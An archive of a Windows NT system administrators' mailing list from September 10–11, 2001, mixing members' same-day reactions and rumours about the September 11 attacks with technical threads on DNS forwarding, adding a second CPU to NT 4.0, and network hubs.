John Hornbuckle Network Manager Taylor County School District 318 North Clark Street Perry, FL 32347 -Original Message- From: Matthew Western [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 7:55 PM To: NT System Admin Issues Subject: Australian Expressing Sadness + Something to think about Hi People, I'd just like to express sadness to all the people in the US affected by the attacks on US. I think it's disgusting and should be punished. While people everywhere are in a state of shock/uncertainty/fear it's worth thinking about where each of us are going to spend our eternal destiny. The Bible predicts basically a World War 3 where everyone will attack Israel and try to wipe them off the face of the earth... Revelation is an interesting book to read through Have a good day (and think about the following excerpt). Regards Matthew
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack You can't retaliate for the sake of retaliating. It could be Americans. -Original Message-From: David James [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 8:45 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I don't mean to promote war, but we as a country HAVE to retaliate to this... F00k the 3rd world countries that harbor terrorists... -Original Message-From: Mal Sasalu [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:33 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I watched over the television. The structures of both north and south towers of WTO came down with a huge blast and now they are basically a heap of rubble. -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 9:30 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. 
Jeff -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack they're both effectively down. -Original Message-From: David N. Precht [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 8:36 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack the second tower hit was about 50 floors toppled... not sure of the other tower -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:30To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. 
Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack http://www.newbie.net/PearlHarbor/casualties.html - Not even close to the number of estimated deaths today. -Original Message- From: John Hornbuckle [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:07 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack How many were killed at Pearl Harbor? John Hornbuckle Network Manager Taylor County School District 318 North Clark Street Perry, FL 32347 -Original Message- From: Nail, Larry [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 12:00 PM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Try Perl Harbor... -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack There will be tons of speculation as our imaginations, paranoia and anger continue to grow. Every supposed expert the news organizations can find will have a theory. -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:42 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack It's starting to be more believed that multiple terrorist groups and even governments would have to be involved to orchestrate such a coordinated attack on the US. Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] -Original Message- From: Sankaranarayanan_Ganapathy [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:09 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Most possible culprit could be Osma bin laden afghan based terrorist,bcoz of the kind of resources used or it could be any one from within America -- From: Phillips, Glen[SMTP:[EMAIL PROTECTED]] Reply To: NT System Admin Issues Sent: Tuesday, September 11, 2001 9:18 PM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Apparently some Palestinian organisation has claimed responsibility. The Islamic groups have denied it all. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 11 September 2001 16:43 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack You can't retaliate for the sake of retaliating. It could be Americans. -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:45 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I don't mean to promote war, but we as a country HAVE to retaliate to this... F00k the 3rd world countries that harbor terrorists... 
-Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:33 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I watched over the television. The structures of both north and south towers of WTO came down with a huge blast and now they are basically a heap of rubble. -Original Message- From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:30 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. 
Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [ mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack Nothing but good thoughts to you Dennis. -Original Message- From: Dennis Atherton [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:09 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I have family that work there and in Battery Park. There are usually 50,000 people in the two towers. Start time is normally 8:00 AM for many, and this was 8:50 AM, so many would be there. It would take over 2 hours to evacuate each tower - working together. Everyone needs to step back and see what happens, but I firmly believe there will be more that 20K PEOPLE dead out of this tragedy. Not numbers, but people. This was a terrorist attack, meant to bring the most devastation with the least risk. -Original Message- From: Jason Gauthier [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:03 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Woah there. No one has said there are 20,000 people dead. There were 20,000 poeple in the towers when the first plane hit. I beleive Tower 1 was being evacuated when it was hit. -Original Message- From: Dennis Atherton [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 12:59 PM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack And you don't think, that with over 20,000 people dead, World War 3 has not been started on our shores now -Original Message- From: Murray Binette [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 9:56 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Well, I just hope that Bush (or the 'Puppet' as many Canadians refer to him as) doesn't fly off the handle and start WWIII. 
-Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:08 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack I would say that the US already feels pretty alienated right now - ASB -Original Message- From: Richard McClary [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:51 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Well, that's one of the reactions terrorism is trying to provoke. Most of the world finds US policy to be obnoxious, and a violent large scale reaction will effectively alienate the US from the rest of the world. I don't mean to promote war, but we as a country HAVE to retaliate to this... F00k the 3rd world countries that harbor terrorists...
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack wow. Those of us that aren't there can't even imagine what you'all are going through. I just heard reports that at least in Phoenix, people are lining up like crazy to donate blood. It's something at least. -Original Message-From: Paul Armstrong [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:18 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Basically, 40K people work in the Towers and there is estimated 200K people who pass thru the towers. most people who live in NJ and work in NY have to take the path trains to get into the city which passes right under the WTC! i actually witnessed the first plane hitting the tower from Brooklyn while waiting for a cab. I am now at work and trapped in the city because all trains buses are locked down. -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:41 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I heard 50+ thousand -Original Message-From: David N. Precht [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:44To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack any stats on how many people work/live in the WTC and/or area? i estimated around 25k-50k ... -Original Message-From: MLewis [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:37To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Both World Trade Center buildings have fallen. There is only rubble where these historic structures stood. Marcella D. Lewis Network Administrator [EMAIL PROTECTED] "Excellence is in the details. Give attention to the details and excellence will come." (Perry Paxton) -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:30 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? 
-Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. 
Good luck, Richard
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack Just heard there's a nutball with a bomb and a gun in Memphis. -Original Message-From: Bart Southworth [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:34 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack That would be difficult. We did take care of the last one, here in good old Indiana. But the thought. Wow. The taliban is being "sketchy," no denial. I'm at a loss. Anyone want to explain this to my 6 4 year olds? The younger is asking now. I dread the eldest coming home from school. I hope you have luck with yours, Andrew. I read on another list, that there may be a coordinated internet "worm" attack. (Not confirmed) -Original Message-From: Andrew Baker [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 12:12To: NT System Admin IssuesSubject: RE: NewYork Terrorist AttackEspecially when we've had Internal Terrorism before. I'm almost hoping it's an external attack, because we will not be able to deal with an internal attack of this magnitude. - ASB http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: DNS problem
did they use the same namespace as their domain name?

-Original Message-
From: Luke Brumbaugh [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 10:40 AM
To: NT System Admin Issues
Subject: RE: DNS problem

Did they hardcode the address in the dns? And is it replicated to all the nameservers registered. And is the ISP letting it go out the firewall?

-Original Message-
From: Matt Moore [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 1:39 PM
To: NT System Admin Issues
Subject: DNS problem

A customer has a pure 2000 network. From the inside we are able to resolve all names internal and external with the exception of their web page which is hosted off site. The internal DNS forwarders are set to talk to the ISP's DNS servers. All of the ISP's DNS records are correct. The ISP hosts their web page. Anybody got any ideas.

Matt Moore
MCSE, MCP+I, NCSS, HP

Enterprise Channel Management Software for Manufacturers
Visit us at http://www.ultryx.com
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: Message I'd rather wait and see. 9/11 is the anniversary of the death of Allende in Chile. The head of that drug cartel was deported to the US, and he's got money. It's too early to tell. -Original Message-From: Allen Crawford [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:42 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Retaliation for executing McVey? -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:57 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack unlikely, yes. But Oklahoma City was done by an American. Wow, did I just get a deja vu while typing this. -Original Message-From: John Hornbuckle [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 8:53 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack That seems very, very unlikely. I heard earlier that a Palestinian group had claimed responsibility, and my hunch is that such a group (whether or not it was this specific group) is to blame. John HornbuckleNetwork ManagerTaylor County School District318 North Clark StreetPerry, FL 32347 -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:43 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack You can't retaliate for the sake of retaliating. It could be Americans. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack Hopefully you'll never have to find out. -Original Message-From: Murray Binette [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 12:11 PMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I find it hard to beleive that the US would give a rats ass if something similar happened in Toronto or Edmonton. -Original Message-From: Paul Armstrong [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 12:13 PMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack How is this relevant? Well, I know some people who work in the WTC who are sys admins and I haven't been able to contact them since the crisis. Obviously there are others who are sys admins who probably lost there lives in this situation. I take it you know noone in NYC and probably dont care. I guess I wouldn't be wrong if the roles were reversed and this happened in your home town and you were caught in the middle of this thing and I didn't care. If you dont like the posts relating to this event, you could always filter them or simply unsubscribe, who cares since you have no sympathy for what has happened today! If this situation gets larger than what it already is and it starts to effect you, you will then find out the relevance to this list!! -Original Message-From: Murray Binette [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 1:43 PMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack How is this relevant to NT system administration? -Original Message-From: Paul Armstrong [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:18 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Basically, 40K people work in the Towers and there is estimated 200K people who pass thru the towers. most people who live in NJ and work in NY have to take the path trains to get into the city which passes right under the WTC! 
i actually witnessed the first plane hitting the tower from Brooklyn while waiting for a cab. I am now at work and trapped in the city because all trains buses are locked down. -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:41 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I heard 50+ thousand -Original Message-From: David N. Precht [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:44To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack any stats on how many people work/live in the WTC and/or area? i estimated around 25k-50k ... -Original Message-From: MLewis [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:37To: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Both World Trade Center buildings have fallen. There is only rubble where these historic structures stood. Marcella D. Lewis Network Administrator [EMAIL PROTECTED] "Excellence is in the details. Give attention to the details and excellence will come." (Perry Paxton) -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:30 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM
RE: Installing second CPU
Title: Installing second CPU

use UPTOMP. Or use the snip below from Anthony Bennett:

Forget UPTOMP. I have successfully used the following technique as provided by Microsoft:

1) Put 2nd processor in
2) Regurgitated from archive (courtesy of Dave Nestor from Microsoft):

I would recommend against using Uptomp.exe unless you have revision 3 of the NT4 Resource Kit. A simpler way to do this is to edit the hidden, read-only file called setup.log that's in the \WINNT\Repair directory and reapply your current service pack. Update.exe from the service pack relies on information in setup.log for the proper files to install, it does not do any discovery process, so if the wrong information is in that file, a dual processor computer can be blindly returned to single processor mode.

Six files in the System32 directory determine NT's multiprocessor capability. NT is multiprocessor by default which is why we load the multiprocessor kernel during a fresh install. Later during that install, if only a single processor is found, we install hal.dll or halapic.dll and rename it to hal.dll and copy in ntoskrnl.exe. Setup will also "smash locks" on four other files, kernel32.dll, ntdll.dll, win32k.sys and winsrv.dll to make them single processor versions. Failure to alter those four files will burden a single processor computer with about a 5% performance hit.

Therefore, the manual way to do an upgrade is, from a command prompt only (using a GUI will give you an access violation) rename the current six files to *.old and copy in fresh versions of

kernel32.dll
ntdll.dll
win32k.sys
winsrv.dll
halmps.dll and rename it to hal.dll
ntkrnlmp.exe and rename it to ntoskrnl.exe

Of course, these had better be files from your current service pack and not from the original CD.

Now you're left with the problem of the setup.log file containing single processor information. The next service pack install will move you back to a single processor version of NT. So edit that file with the following information, being careful to enter the correct checksums which will tell the next service pack not to "smash locks" on four files.

\WINNT\system32\ntoskrnl.exe = "ntkrnlmp.exe","e76ab"
\WINNT\system32\hal.dll = "halmps.dll","1a01c"
\WINNT\system32\kernel32.dll = "kernel32.dll","5b7f8"
\WINNT\system32\ntdll.dll = "ntdll.dll","59c19"
\WINNT\system32\win32k.sys = "win32k.sys","132603"
\WINNT\system32\winsrv.dll = "winsrv.dll","37b4e"

Do a notepad search on the individual file names to find these lines, since they are not together in setup.log.

OK, now you're done. Or, edit the setup.log first and reapply your current service pack. That's the quick way to do this.

=
Cheers,
Anthony Bennett

-Original Message-
From: Blake R. Fowkes [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 11:41 AM
To: NT System Admin Issues
Subject: Installing second CPU

I am wanting to install a second processor in my Dell 1400 server. Can anyone point me in the right direction as to what I will need to do to Windows NT 4.0 server to make sure I do not mess things up.

Thanks,
Blake Fowkes
Waid and Associates
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
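An added example (not from the original post and not a Microsoft tool): a Python check that reads setup.log text and reports which of the six entries quoted above still differ from the multiprocessor values, so the file can be verified before a service pack is reapplied. The line format and checksums are taken from the post; the sample log and its non-matching checksums are constructed for illustration.

```python
import re

# Entries exactly as quoted in the post: installed path -> (source file, checksum).
# The checksums belong to whichever service pack the post was written for
# (the post does not say which); replace them for any other build.
EXPECTED_MP = {
    r"\winnt\system32\ntoskrnl.exe": ("ntkrnlmp.exe", "e76ab"),
    r"\winnt\system32\hal.dll": ("halmps.dll", "1a01c"),
    r"\winnt\system32\kernel32.dll": ("kernel32.dll", "5b7f8"),
    r"\winnt\system32\ntdll.dll": ("ntdll.dll", "59c19"),
    r"\winnt\system32\win32k.sys": ("win32k.sys", "132603"),
    r"\winnt\system32\winsrv.dll": ("winsrv.dll", "37b4e"),
}

# One entry per line: \path\file = "source","checksum"
LINE_RE = re.compile(
    r'^\s*(?P<path>\\[^=]+?)\s*=\s*"(?P<src>[^"]+)"\s*,\s*"(?P<sum>[0-9A-Fa-f]+)"'
)

# Constructed sample: the two kernel/HAL lines still name uniprocessor sources,
# kernel32.dll has a checksum that is not the one from the post, and the
# winsrv.dll line is absent. All non-matching checksums here are made up.
SAMPLE_SETUP_LOG = r"""
[Files.WinNt]
\WINNT\system32\cmd.exe = "cmd.exe","22222"
\WINNT\system32\ntoskrnl.exe = "ntoskrnl.exe","00000"
\WINNT\system32\hal.dll = "hal.dll","00000"
\WINNT\system32\kernel32.dll = "kernel32.dll","11111"
\WINNT\system32\ntdll.dll = "ntdll.dll","59c19"
\WINNT\system32\win32k.sys = "win32k.sys","132603"
"""


def parse_setup_log(text):
    """Return {lowercased path: (lowercased source name, lowercased checksum)}."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries[m["path"].lower()] = (m["src"].lower(), m["sum"].lower())
    return entries


def audit(text, expected=EXPECTED_MP):
    """List (path, status, found) for every expected entry that does not match.

    status is "missing", "wrong-source" or "wrong-checksum"; an empty list
    means all six lines already carry the multiprocessor values.
    """
    entries = parse_setup_log(text)
    findings = []
    for path, (src, checksum) in expected.items():
        found = entries.get(path)
        if found is None:
            findings.append((path, "missing", None))
        elif found[0] != src:
            findings.append((path, "wrong-source", found))
        elif found[1] != checksum:
            findings.append((path, "wrong-checksum", found))
    return findings


if __name__ == "__main__":
    for path, status, found in audit(SAMPLE_SETUP_LOG):
        print(f"{status:15} {path} {found or ''}")
```

On a system installed somewhere other than \WINNT the keys in EXPECTED_MP need the matching directory name.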
RE: Attack and Gas Prices
Title: RE: Attack and Gas Prices blackberry would do that. -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 2:43 PM To: NT System Admin Issues Subject: RE: Attack and Gas Prices Hey, do you have a computer in your CAR I want one of those. Murray F. -Original Message- From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 4:34 PM To: NT System Admin Issues Subject: RE: Attack and Gas Prices I just stopped at our local Cumberland Farms gas station here in Southeastern MA and the price is unchanged. Regular unleaded is at $1.37. Mark Kelsay -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 4:11 PM To: NT System Admin Issues Subject: Attack and Gas Prices Can anyone confirm that gas prices are going up around the country? Supposedly it's around $6.00 a gallon already in some places... http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Silicon Valley salary
Title: RE: Silicon Valley salary try www.salary.com. Should be lucrative for you. -Original Message- From: Markus Laker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 2:56 PM To: NT System Admin Issues Subject: Silicon Valley salary Once the authorities get around to processing visa applications again, and once the airports reopen, my employer is planning to move me from its UK office here in Bracknell to its San Jose office for a couple of years. Marvellous timing, I know. Salary negotiations are beginning in earnest. Most of the Californian job sites I can find don't mention salaries these days (surprise, surprise). What does a competent C++ developer earn in Silicon Valley these days? Thanks and regards, Markus http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hub Recommendations
Title: Message I agree that getting switches is the way to go. I've got a HP which is kind of nice because of the expansion capability. You just add 8-port modules as needed. -Original Message-From: Don Ely [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 12:13 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations Cisco Catalyst Series Switches are some of the best and most reliable. Managed switches are better if you're looking to trap SNMP traffic. D -Original Message-From: Roger Wright [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 12:09 PMTo: NT System Admin IssuesSubject: Hub Recommendations I need to replace one of my hubs (the smoke leaked out of the box) and would appreciate some recommendations. I'd like to get three 24 port auto-sensing 10/100 units.This will give me 8-10 spare ports for expansion in our 65-node network. What is the difference between a hub and a managed hub? Should I consider installing switches rather than plain hubs? Brand recommendations? We've been using Intel units but I have no loyalty to any particular product line at this time. Roger Wright Southern Commerce Bank ___ Among economists, the real world is often a special case. --Horngren http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ___ NOTICE: The information contained in this electronic message is considered privileged and confidential under Florida Statutes 455.251 and 3905.017. It is intended solely for the use of the recipient named above. If the reader is not the recipient named above, you are hereby notified that any dissemination, distribution, copying or disclosure of the contents of this message is prohibited. If you have received this e-mail message in error, please immediately notify the sender and destroy the original message. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hub Recommendations
